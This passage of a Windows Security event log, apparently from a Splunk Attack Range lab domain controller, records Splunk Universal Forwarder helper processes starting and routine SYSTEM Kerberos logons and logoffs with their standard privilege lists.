New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264458
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1518
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264457
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264459
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264462
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x814DE4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:13:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264461
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x814DE4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62670
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:13:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264460
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x814DE4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264473
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81526E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264472
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81535C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264471
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8153A4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264470
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x815437
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62675
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264469
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x815437
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264468
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8153A4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62674
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264467
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8153A4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264466
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81535C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264465
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81535C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264464
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81526E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62673
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264463
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81526E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:14:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264475
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264474
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264476
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1734
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264477
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1554
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264478
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1384
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264480
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264479
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1690
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
